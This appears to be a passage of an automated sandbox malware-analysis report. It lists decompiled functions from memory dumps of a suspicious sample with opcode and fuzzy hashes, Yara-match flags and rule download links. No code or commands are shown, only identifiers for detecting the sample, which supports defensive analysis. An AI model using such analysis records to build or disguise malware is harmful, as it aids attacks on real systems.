                                                                                                                                                                                                                                                          Function 004325C0 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f6d3825610b41e91197ba453ef466a61188bc5b3caf59aac110188e3e18479e5
                                                                                                                                                                                                                                                          • Instruction ID: a2567c92ef43b00eb5ac24927b4a0e67434e8ffca14489f9b64a438a09366c4a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6d3825610b41e91197ba453ef466a61188bc5b3caf59aac110188e3e18479e5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52515A37759A904FD32C8E3C4D622AA7A831FDB230F2D976FA5B1873F1C59848069355
                                                                                                                                                                                                                                                          Function 0248C708 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                                                                                                                                                                                          • Instruction ID: e8fe9899f774a6cf6d904d0e4f9e28ed5797f666ce8295dca271583f39949d70
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C44159319183E14FC318CF2988A077BBFE1AFD2205F18486EE8C297252D7719509C7A1
                                                                                                                                                                                                                                                          Function 0041C4A1 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                                                                                                                                                                                          • Instruction ID: 07da38b744f74d32d30d1671ecbd769a37b19a8d909b10be6a8f0c0ec6ed584f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 904179329083E18FC314CF2988A06BBBFE2AFD3300F58586EE4C6A7252D6759945C791
                                                                                                                                                                                                                                                          Function 02488C5C Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction ID: b38194ab03c2fe5ce4dae739709dab415b1373cb946f98696347a71e3665bf11
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5241ED706183858BD726DF28C8A13ABB7E2FFD2314F09895ED8D64B3A1E3749401C752
                                                                                                                                                                                                                                                          Function 004189F5 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction ID: 9e509f52d19214b1ec568ce11ceb71cbfab3577535b604abfaf285835f568e3c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F41E1706083818BD725CF28C8A13ABB7E1FFD6310F09995ED8D64B391EB789841C756
                                                                                                                                                                                                                                                          Function 024AEAA7 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 63040f06683986dca738971f6d4247c9d5342c09c9e767a3b9d9615f13ed9c22
                                                                                                                                                                                                                                                          • Instruction ID: ba358671e95d0fa646f21f946ee44869ecc76b1e62f85d5e455308e4e07dfe9e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63040f06683986dca738971f6d4247c9d5342c09c9e767a3b9d9615f13ed9c22
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB4135367053009BE311EB24CCA4B6BB7E6FBA5308F19883DE58597360E731F9108682
                                                                                                                                                                                                                                                          Function 024AEC37 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d13bc2e057d9c21611771e243c0c86c4b4679832e0bae0da6ba9141d96a869e2
                                                                                                                                                                                                                                                          • Instruction ID: ede760f15db04cc87effda6329bc578caa368f000e7589fa2f6e96b9d76f425a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d13bc2e057d9c21611771e243c0c86c4b4679832e0bae0da6ba9141d96a869e2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 124126363143059FE311EB24CC90F2BB7A6EBE5708F59843DE685A7360E731E910C692
                                                                                                                                                                                                                                                          Function 0043E9D0 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 253f6f66a1300c149e40b5d3da680a7805a5c6fb2f6ccbfc1551ffe3cb2f6ede
                                                                                                                                                                                                                                                          • Instruction ID: 92a325f3e00a29098394c1b7216cb9cdc88ca7f48b0bc32bbab928656b7252fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 253f6f66a1300c149e40b5d3da680a7805a5c6fb2f6ccbfc1551ffe3cb2f6ede
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 784128362153009FD311EB25CC81F2BF7A6FB89304F29892DE58597390E735BD11878A
                                                                                                                                                                                                                                                          Function 02486FB8 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 141b934935f16105c6d4b55c7b66c04104fe35f68287d6a4d202787efe3b454c
                                                                                                                                                                                                                                                          • Instruction ID: e130365d90b88dcd87f550dc3dba8973355e641b2b8a3519319441cf7ea9cc0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 141b934935f16105c6d4b55c7b66c04104fe35f68287d6a4d202787efe3b454c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A921483A6582019BD734DB14C880BBFB7A7E7C9314F2A903ADAC897366D7709842CB55
                                                                                                                                                                                                                                                          Function 00416D51 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 65ddef03801a8d6a134df6b67e7aa04b8106f0a9bdaf087d14fbb58d7c66cdf8
                                                                                                                                                                                                                                                          • Instruction ID: 7a8fcb3d106e3c360318abd82b338159047ca284191804e75a51eac247b9b9a3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65ddef03801a8d6a134df6b67e7aa04b8106f0a9bdaf087d14fbb58d7c66cdf8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9821253A6482019BD7348F14D881BFBB7A7E7C9314F1A853AD8C857262D674DC82CB59
                                                                                                                                                                                                                                                          Function 0249A836 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3d39b44c0b208424fc79c9eed5777738ebb0ac8c5f6242e23808669263839f6e
                                                                                                                                                                                                                                                          • Instruction ID: 37666ffdb8c94c9856dbf2fcfd108109a493903e27e1dee41203fb6492c8e062
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d39b44c0b208424fc79c9eed5777738ebb0ac8c5f6242e23808669263839f6e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE31E87790426087DB25DF04D85053AFBE2FB99218F1A5B3EDDCA6B710C331D851CA86
                                                                                                                                                                                                                                                          Function 0042A5CF Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 90998edaf19dc0de3982f94391ae43dd229cb31cafb7006fc017a21888f38579
                                                                                                                                                                                                                                                          • Instruction ID: 47583b5e97d7f103921451c9a3e00715a691b789a83416de6f265e9d05206047
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90998edaf19dc0de3982f94391ae43dd229cb31cafb7006fc017a21888f38579
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2431F8BBA0456087D3249F05E44053BB3A2BF9D304F5B9A2EDDC663311C338DC61868B
                                                                                                                                                                                                                                                          Function 02486B91 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c54af2dd7dfcf621942cf22b1021416c863c66fbd3bc923790bc9af9107b0d5c
                                                                                                                                                                                                                                                          • Instruction ID: 204e8e0b5bbb325f0c6dfa480f46b3a66ace9cbeef6327951b824bc36780b9e2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c54af2dd7dfcf621942cf22b1021416c863c66fbd3bc923790bc9af9107b0d5c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F02123726182118BC328DF18C491ABFB3EAFB89308F0A597ED6C9D3251D734D941CBA5
                                                                                                                                                                                                                                                          Function 02487178 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5ccccd4456b46f379f5778a02a902abc6498e32b59f6707b6d5c6060ba36a55c
                                                                                                                                                                                                                                                          • Instruction ID: ad8a11c7db490591d5c477e8c8f758b44bd6545427c95ed230ccdec0dabfae36
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ccccd4456b46f379f5778a02a902abc6498e32b59f6707b6d5c6060ba36a55c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F921373E66510087D718AB04C8A177EF313EBC6228F3D517BD5991B766C7308C43CA56
                                                                                                                                                                                                                                                          Function 00416F11 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 04ca0380971d0a00c209c8a602c4bd239860316309a299126eb1095b67431ec3
                                                                                                                                                                                                                                                          • Instruction ID: e8aae8d7966c512091e9033bb6d6e6425441c1bb8404dc25c5ced89e9e60b8de
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04ca0380971d0a00c209c8a602c4bd239860316309a299126eb1095b67431ec3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B21293A64910087D7189B04EC916BA7313EBC6368F2A507ED9991735AC734DC83CA5D
                                                                                                                                                                                                                                                          Function 024A863B Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ad8f7ca2d12a15ff2db3708ff1b4ebf3e6c444e7e3fa4a4b45a5b81ac9e55cdb
                                                                                                                                                                                                                                                          • Instruction ID: 1f3d4f908c2e7129619914aae87f55d0a8321ec47b313a27c1459eab115cca06
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad8f7ca2d12a15ff2db3708ff1b4ebf3e6c444e7e3fa4a4b45a5b81ac9e55cdb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 352166F1209740ABE708DF18D890B3FB7E2EB94340F18443EE58687264EB309891CB42
                                                                                                                                                                                                                                                          Function 004144A5 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 53684694feb93490cd138d9ad25668747eed931bcaa49a3c6c7b0a28c9a3bffb
                                                                                                                                                                                                                                                          • Instruction ID: 56270ea7693ceef52b1e7f48f884af2e6824f94f3014568ecd75d0ffec1498b1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53684694feb93490cd138d9ad25668747eed931bcaa49a3c6c7b0a28c9a3bffb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD215BB9918201EBE3009F10E802B7FB360EB86715F04083DF88557292D739DD568B4F
                                                                                                                                                                                                                                                          Function 02472DA7 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                                                                                                                                                                                          • Instruction ID: f145461d4af09953d82fb9a51eab7ef7d271e0023b6b66205f59201b38b7864f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811E33BB356210BE350DF35DCD469B7392EBD6214B0A0536EE51D7312CAB2E862D2E4
                                                                                                                                                                                                                                                          Function 00402B40 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                                                                                                                                                                                          • Instruction ID: 469048f7263bc164ad3881534af0991a1148d7447d9efeb03a4489370524f0df
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F11E23BB2922107E350DF26DDD861B6352EBD631070A0135EE41E33C2CAB5F811D198
                                                                                                                                                                                                                                                          Function 0247A611 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction ID: d8c474953adb699087323e54512d4f31bee5695cd25c508fb9a34fe427443190
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A212436F041624BC719CF3CC4601E9B7E35F8A61432D907AC8D1FB719DA3499578A90
                                                                                                                                                                                                                                                          Function 0040A3AA Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction ID: 11c6c97c577772a1d5d73abb7cc6e1959aec10da5a85461a06fefa762ba80ee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C121053AB442624BC718CF3CC4601E9B7E35F8A31432D907ACC81FB355DA789D668B55
                                                                                                                                                                                                                                                          Function 02478B17 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction ID: c4656477437c59dae31965237e27f50ad844dcf18d2dd3be2157ff5b89d94bfc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB11DA73E128204BD320891588447667656ABD9338F3E47E5D9389F7E2C97B9C1386C4
                                                                                                                                                                                                                                                          Function 004088B0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
